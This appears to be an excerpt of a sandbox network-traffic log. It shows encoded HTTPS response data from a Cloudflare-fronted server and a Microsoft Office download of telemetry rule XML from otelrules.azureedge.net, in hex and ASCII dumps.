                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8e5ef9266dbf42b5-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1755&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=950&delivery_rate=1569892&cwnd=214&unsent_bytes=0&cid=fd7ed59b29c32abc&ts=1407&x=0"
                                                                                                                                                                              2024-11-21 07:30:14 UTC392INData Raw: 34 34 36 63 0d 0a 63 51 38 63 62 71 52 62 76 53 57 44 44 78 63 72 39 48 44 34 64 78 4f 46 4e 48 46 49 6c 77 56 4b 65 41 6c 33 41 51 41 4e 32 62 49 4b 4c 57 70 4d 6e 6d 2b 52 42 2f 42 71 4e 52 47 41 41 6f 30 53 50 36 64 56 46 57 71 74 59 79 73 55 65 68 49 74 49 6e 75 30 6b 45 74 70 66 51 4c 58 50 70 45 48 35 6e 63 31 45 61 38 4c 32 68 4a 39 70 77 35 54 4c 66 31 6e 4b 78 52 72 46 6d 70 76 66 62 58 52 47 57 4e 37 42 73 45 34 32 55 54 76 59 6e 4a 4f 6b 52 47 53 47 58 72 6f 58 42 78 71 75 79 63 76 41 69 74 4e 49 30 31 6f 72 64 4d 38 62 6d 38 46 68 69 61 52 58 71 46 71 65 51 6e 4f 55 70 6b 53 63 65 6c 53 46 53 50 2f 62 53 49 63 61 68 4e 72 63 47 53 2f 32 68 6c 74 65 41 66 4c 4d 63 31 4a 35 57 56 35 53 4a 73 52 32 6c 73 78 34 45 35 54 63 72 55 30 47 68 6c 36 42
                                                                                                                                                                              Data Ascii: 446ccQ8cbqRbvSWDDxcr9HD4dxOFNHFIlwVKeAl3AQAN2bIKLWpMnm+RB/BqNRGAAo0SP6dVFWqtYysUehItInu0kEtpfQLXPpEH5nc1Ea8L2hJ9pw5TLf1nKxRrFmpvfbXRGWN7BsE42UTvYnJOkRGSGXroXBxquycvAitNI01ordM8bm8FhiaRXqFqeQnOUpkScelSFSP/bSIcahNrcGS/2hlteAfLMc1J5WV5SJsR2lsx4E5TcrU0Ghl6B
                                                                                                                                                                              2024-11-21 07:30:14 UTC1369INData Raw: 30 2b 51 6f 59 2b 78 77 65 35 4c 56 5a 4d 68 68 57 57 41 7a 50 64 46 67 78 6b 37 43 63 76 46 69 74 4e 49 32 70 71 75 4e 4d 59 59 6e 30 45 7a 53 76 66 56 65 64 67 63 46 75 51 46 35 51 66 63 76 56 63 48 53 7a 32 62 69 4d 54 62 68 4a 6e 49 69 48 37 31 77 73 74 4a 6b 7a 6e 4e 4e 52 4c 36 33 70 31 43 59 6c 63 67 31 56 32 36 78 5a 4c 61 76 46 6d 4c 42 74 76 47 32 31 6d 59 37 33 65 48 6d 4a 34 42 73 59 2b 31 55 2f 70 62 48 68 43 6d 52 4b 66 47 48 58 68 57 68 49 76 74 53 6c 6f 48 58 4e 56 4f 79 4a 42 76 4e 4d 42 4c 30 73 50 79 44 66 59 55 61 46 79 4f 31 44 57 46 5a 5a 56 4b 61 64 59 46 69 58 6e 5a 6a 6f 66 5a 51 64 76 5a 32 6d 32 30 78 31 74 65 77 76 4c 4e 39 6c 41 34 6d 56 78 53 4a 67 65 6b 42 5a 31 35 42 5a 64 61 76 4a 2f 61 45 49 72 4a 47 42 6d 61 4b 6e 54 48
                                                                                                                                                                              Data Ascii: 0+QoY+xwe5LVZMhhWWAzPdFgxk7CcvFitNI2pquNMYYn0EzSvfVedgcFuQF5QfcvVcHSz2biMTbhJnIiH71wstJkznNNRL63p1CYlcg1V26xZLavFmLBtvG21mY73eHmJ4BsY+1U/pbHhCmRKfGHXhWhIvtSloHXNVOyJBvNMBL0sPyDfYUaFyO1DWFZZVKadYFiXnZjofZQdvZ2m20x1tewvLN9lA4mVxSJgekBZ15BZdavJ/aEIrJGBmaKnTH
                                                                                                                                                                              2024-11-21 07:30:14 UTC1369INData Raw: 43 4e 64 5a 4b 35 32 31 79 54 5a 4d 41 6e 78 78 39 36 78 5a 64 61 76 4a 2f 61 45 49 72 4f 6d 52 30 62 4a 54 54 41 6d 51 2b 45 34 67 67 6e 30 44 74 4c 53 30 4a 6b 52 65 53 48 6e 66 76 56 67 45 76 2b 32 77 70 45 47 30 55 62 6d 35 70 75 39 45 54 61 33 49 4d 77 54 37 4e 56 65 52 72 5a 30 50 57 58 4e 6f 53 61 61 63 4f 55 78 7a 6c 63 44 6b 4d 4b 53 42 67 62 47 47 38 78 6c 4e 79 4d 42 57 47 50 74 4d 48 75 53 31 2b 53 5a 6f 56 6b 68 4e 31 37 31 6b 63 49 2b 64 6d 4a 42 52 35 45 6d 4e 72 59 62 54 63 47 6d 42 35 41 63 30 7a 30 6b 50 6d 62 44 55 48 31 68 57 43 56 53 6d 6e 59 41 4d 6e 2b 55 6b 6a 46 6d 4a 56 66 43 78 32 2b 39 63 66 4c 53 5a 4d 77 6a 58 58 54 65 35 6b 66 30 4f 5a 47 35 6f 64 65 4f 35 56 45 79 62 7a 5a 69 51 57 5a 68 42 67 5a 32 4b 2b 30 42 39 71 65 51
                                                                                                                                                                              Data Ascii: CNdZK521yTZMAnxx96xZdavJ/aEIrOmR0bJTTAmQ+E4ggn0DtLS0JkReSHnfvVgEv+2wpEG0Ubm5pu9ETa3IMwT7NVeRrZ0PWXNoSaacOUxzlcDkMKSBgbGG8xlNyMBWGPtMHuS1+SZoVkhN171kcI+dmJBR5EmNrYbTcGmB5Ac0z0kPmbDUH1hWCVSmnYAMn+UkjFmJVfCx2+9cfLSZMwjXXTe5kf0OZG5odeO5VEybzZiQWZhBgZ2K+0B9qeQ
                                                                                                                                                                              2024-11-21 07:30:14 UTC1369INData Raw: 48 36 46 68 64 6b 57 65 48 5a 77 63 66 65 31 66 47 43 62 2b 59 79 51 54 62 68 4e 69 5a 32 71 36 31 42 39 6e 65 41 2f 46 4e 74 42 49 36 53 30 37 43 5a 45 4b 32 6b 30 78 77 6b 45 59 4a 50 4d 6e 4e 31 52 79 56 57 52 75 4c 2b 4f 51 48 32 52 34 43 73 4d 31 33 6b 48 70 61 48 31 4e 6c 78 53 63 46 6e 37 6a 55 78 49 6c 38 57 73 6d 45 47 6f 55 62 32 6c 67 73 4e 56 54 49 7a 34 4c 33 6e 6d 48 42 39 42 75 59 31 36 47 48 74 6f 4b 50 2f 34 57 46 43 61 31 50 32 67 62 65 52 39 70 62 47 71 30 31 52 42 69 65 51 48 41 4e 64 56 4f 36 57 74 36 51 49 51 52 6c 68 74 32 36 56 6f 64 4a 2f 39 6b 4a 56 6f 6c 56 57 52 36 4c 2b 4f 51 50 32 70 7a 49 73 30 31 32 41 66 2b 49 32 77 4a 6b 52 37 61 54 54 48 72 58 42 38 6a 39 57 34 74 45 6d 41 63 5a 6d 4e 6b 76 74 4d 56 59 48 45 46 31 44 50
                                                                                                                                                                              Data Ascii: H6FhdkWeHZwcfe1fGCb+YyQTbhNiZ2q61B9neA/FNtBI6S07CZEK2k0xwkEYJPMnN1RyVWRuL+OQH2R4CsM13kHpaH1NlxScFn7jUxIl8WsmEGoUb2lgsNVTIz4L3nmHB9BuY16GHtoKP/4WFCa1P2gbeR9pbGq01RBieQHANdVO6Wt6QIQRlht26VodJ/9kJVolVWR6L+OQP2pzIs012Af+I2wJkR7aTTHrXB8j9W4tEmAcZmNkvtMVYHEF1DP
                                                                                                                                                                              2024-11-21 07:30:14 UTC1369INData Raw: 58 4e 47 6e 78 47 56 46 48 6a 72 57 78 59 6a 38 47 59 75 48 6d 45 66 59 32 52 70 75 74 55 5a 62 6e 38 47 7a 7a 37 58 51 4f 4a 2f 4e 51 66 57 46 59 4a 56 4b 61 64 2f 46 44 6a 37 64 32 67 46 4a 51 77 6a 5a 57 50 37 69 46 4e 70 64 41 50 43 50 74 4e 42 35 47 74 34 53 4a 6b 54 6d 68 70 31 37 46 38 56 4b 2f 68 69 4a 52 35 35 48 32 68 74 59 37 4c 63 48 69 30 77 54 4d 45 68 6e 78 2b 68 58 48 68 48 6d 42 57 4d 56 57 36 70 54 31 4d 74 2b 53 64 77 57 6d 6f 5a 62 47 46 67 75 4e 4d 53 5a 32 77 65 79 6a 44 58 51 75 31 6d 65 30 2b 45 46 4a 55 63 63 75 52 66 46 43 4c 35 62 53 73 64 4b 31 73 6a 5a 58 66 37 69 46 4e 4f 61 52 7a 4c 65 63 41 4a 2b 43 31 79 52 64 5a 4b 32 68 31 38 37 31 77 58 4c 66 68 67 4c 68 4e 35 48 47 5a 73 62 37 2f 62 48 47 74 36 44 38 59 72 32 55 50 70
                                                                                                                                                                              Data Ascii: XNGnxGVFHjrWxYj8GYuHmEfY2RputUZbn8Gzz7XQOJ/NQfWFYJVKad/FDj7d2gFJQwjZWP7iFNpdAPCPtNB5Gt4SJkTmhp17F8VK/hiJR55H2htY7LcHi0wTMEhnx+hXHhHmBWMVW6pT1Mt+SdwWmoZbGFguNMSZ2weyjDXQu1me0+EFJUccuRfFCL5bSsdK1sjZXf7iFNOaRzLecAJ+C1yRdZK2h1871wXLfhgLhN5HGZsb7/bHGt6D8Yr2UPp
                                                                                                                                                                              2024-11-21 07:30:14 UTC1369INData Raw: 59 56 67 6c 55 70 70 33 63 49 4b 66 6c 71 61 41 55 6c 44 43 4e 6c 59 2f 75 49 55 32 46 77 43 63 59 7a 32 55 50 6b 61 33 39 4d 6c 68 6d 5a 47 6e 58 68 55 68 77 71 2f 6d 34 70 48 47 34 66 61 47 52 69 75 4e 59 56 4c 54 42 4d 77 53 47 66 48 36 46 4e 62 6b 53 61 46 64 6f 4b 50 2f 34 57 46 43 61 31 50 32 67 52 5a 78 46 6b 59 6d 4b 34 32 42 5a 70 64 41 6e 47 4d 63 31 50 34 57 70 6e 57 35 59 62 6e 78 6c 79 35 31 49 56 49 2f 4e 6b 4c 46 6f 6c 56 57 52 36 4c 2b 4f 51 50 6d 46 35 4a 63 45 69 6e 31 69 76 64 44 56 4f 6d 6c 4c 43 56 58 44 73 58 42 77 6e 39 6d 45 72 45 57 34 66 59 6d 56 6e 74 73 49 51 59 6e 45 49 78 6a 62 5a 51 65 42 69 63 30 36 66 45 35 49 53 4d 61 6b 57 46 44 4b 31 50 32 67 30 62 42 5a 6e 49 6e 44 31 79 56 4e 71 63 6b 79 65 65 64 39 4e 36 32 64 37 53
                                                                                                                                                                              Data Ascii: YVglUpp3cIKflqaAUlDCNlY/uIU2FwCcYz2UPka39MlhmZGnXhUhwq/m4pHG4faGRiuNYVLTBMwSGfH6FNbkSaFdoKP/4WFCa1P2gRZxFkYmK42BZpdAnGMc1P4WpnW5Ybnxly51IVI/NkLFolVWR6L+OQPmF5JcEin1ivdDVOmlLCVXDsXBwn9mErEW4fYmVntsIQYnEIxjbZQeBic06fE5ISMakWFDK1P2g0bBZnInD1yVNqckyeed9N62d7S
                                                                                                                                                                              2024-11-21 07:30:14 UTC1369INData Raw: 56 61 61 63 4f 55 78 2f 32 61 53 59 64 66 51 51 75 52 58 6d 78 31 77 4e 71 61 51 4f 47 64 35 39 42 6f 54 55 6d 42 39 59 57 69 31 55 70 74 77 52 49 66 36 59 77 65 45 68 30 57 33 6f 69 65 66 75 49 51 53 4d 2b 48 6f 5a 68 6e 77 44 69 66 32 64 50 6c 51 53 5a 55 6b 2f 5a 63 51 6b 6e 38 33 41 35 4a 46 55 53 65 57 39 70 72 4d 46 66 65 48 30 43 79 44 37 4a 42 36 38 74 65 67 6e 4f 4b 39 70 64 4d 64 67 59 55 7a 4b 31 50 32 67 76 61 42 74 74 5a 58 6d 71 6e 54 52 33 63 77 72 52 4b 4a 38 4a 6f 57 73 31 45 63 5a 63 32 68 46 67 70 77 35 44 65 4b 34 79 65 30 30 37 52 33 77 73 64 76 76 47 55 7a 55 73 51 6f 59 72 6e 78 2b 68 4b 6e 5a 62 68 42 53 5a 41 33 4b 67 61 43 30 45 38 6d 45 74 48 58 74 58 54 57 6c 37 76 4a 42 64 4c 58 46 4d 6e 67 43 66 44 36 46 53 4f 77 6d 4f 55 73
                                                                                                                                                                              Data Ascii: VaacOUx/2aSYdfQQuRXmx1wNqaQOGd59BoTUmB9YWi1UptwRIf6YweEh0W3oiefuIQSM+HoZhnwDif2dPlQSZUk/ZcQkn83A5JFUSeW9prMFfeH0CyD7JB68tegnOK9pdMdgYUzK1P2gvaBttZXmqnTR3cwrRKJ8JoWs1EcZc2hFgpw5DeK4ye007R3wsdvvGUzUsQoYrnx+hKnZbhBSZA3KgaC0E8mEtHXtXTWl7vJBdLXFMngCfD6FSOwmOUs
                                                                                                                                                                              2024-11-21 07:30:14 UTC1369INData Raw: 46 6b 74 36 70 7a 78 39 53 54 78 46 4d 58 30 68 6f 70 41 46 4c 53 5a 65 69 48 6e 4e 42 37 6b 74 4d 6b 71 45 41 4a 77 57 5a 2b 51 52 4c 52 54 53 61 53 38 62 66 51 56 30 62 53 43 56 35 6a 4a 54 51 42 6e 46 4e 39 46 41 39 33 77 31 42 39 59 64 32 6b 31 49 70 78 35 54 46 62 73 6e 4d 46 6f 7a 56 56 5a 68 59 62 58 58 42 58 77 7a 4b 38 67 2b 33 6c 48 78 65 6e 6f 47 75 43 53 37 56 54 2b 6e 55 46 4e 79 70 79 6c 6f 48 6e 70 56 4f 7a 49 39 34 49 56 41 4f 69 35 65 32 58 66 47 42 2f 63 74 4c 52 76 59 55 6f 68 56 4b 61 63 52 45 44 6a 6e 59 53 73 4d 61 46 4a 64 58 45 69 31 31 78 4a 37 62 67 48 4b 47 4e 78 57 36 31 4e 4c 58 4a 55 63 6c 42 4a 6e 39 68 5a 64 61 76 6f 6e 63 43 4d 72 58 53 4e 64 49 66 76 49 55 7a 55 2b 4f 63 55 33 30 55 44 33 66 44 68 75 6d 42 57 62 41 32 48
                                                                                                                                                                              Data Ascii: Fkt6pzx9STxFMX0hopAFLSZeiHnNB7ktMkqEAJwWZ+QRLRTSaS8bfQV0bSCV5jJTQBnFN9FA93w1B9Yd2k1Ipx5TFbsnMFozVVZhYbXXBXwzK8g+3lHxenoGuCS7VT+nUFNypyloHnpVOzI94IVAOi5e2XfGB/ctLRvYUohVKacREDjnYSsMaFJdXEi11xJ7bgHKGNxW61NLXJUclBJn9hZdavoncCMrXSNdIfvIUzU+OcU30UD3fDhumBWbA2H
                                                                                                                                                                              2024-11-21 07:30:14 UTC1369INData Raw: 62 55 70 61 41 49 72 54 53 4e 50 66 62 7a 41 45 43 39 53 43 38 73 31 6e 31 69 76 64 44 56 66 31 6b 72 4a 57 7a 48 31 46 6b 74 71 73 6d 51 36 43 47 30 57 64 57 45 6f 68 65 34 2b 66 33 6b 63 78 58 76 75 53 75 56 37 59 45 71 47 46 61 51 72 58 50 56 52 41 79 6d 33 51 68 4a 59 57 67 4e 67 59 6d 47 38 6b 46 30 74 5a 6b 79 65 65 66 4a 56 35 6e 31 32 43 37 4d 6f 32 43 52 6e 35 46 59 64 4c 62 56 34 5a 67 4d 72 41 79 4d 36 50 50 57 51 41 53 30 6d 54 49 45 33 30 6b 62 69 59 33 5a 62 68 42 53 5a 41 33 4b 67 61 43 30 46 2f 6d 59 34 46 33 6f 59 5a 33 52 52 68 66 63 56 61 48 6b 79 2b 41 37 4f 51 50 45 76 55 30 71 41 45 64 70 62 4d 66 38 57 53 32 72 53 59 53 30 64 4b 31 73 6a 5a 69 2f 6a 6b 44 78 6d 66 78 7a 4c 4b 4e 4a 44 39 79 39 53 54 35 4d 56 32 6c 73 78 36 78 5a 4c
                                                                                                                                                                              Data Ascii: bUpaAIrTSNPfbzAEC9SC8s1n1ivdDVf1krJWzH1FktqsmQ6CG0WdWEohe4+f3kcxXvuSuV7YEqGFaQrXPVRAym3QhJYWgNgYmG8kF0tZkyeefJV5n12C7Mo2CRn5FYdLbV4ZgMrAyM6PPWQAS0mTIE30kbiY3ZbhBSZA3KgaC0F/mY4F3oYZ3RRhfcVaHky+A7OQPEvU0qAEdpbMf8WS2rSYS0dK1sjZi/jkDxmfxzLKNJD9y9ST5MV2lsx6xZL


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              3192.168.2.64971213.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:16 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:16 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:16 GMT
                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                              Content-Length: 218853
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public
                                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 16:37:24 GMT
                                                                                                                                                                              ETag: "0x8DD08B87243495C"
                                                                                                                                                                              x-ms-request-id: b5254561-a01e-0070-0158-3b573b000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073016Z-178bfbc474bkvpdnhC1NYCuu2w000000016g000000009h22
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:16 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                              Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                              2024-11-21 07:30:16 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                              Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                              2024-11-21 07:30:16 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                              Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                              2024-11-21 07:30:16 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                              Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                              2024-11-21 07:30:16 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                              Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                              2024-11-21 07:30:16 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                              Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                              2024-11-21 07:30:16 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                              Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                              2024-11-21 07:30:17 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                              Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
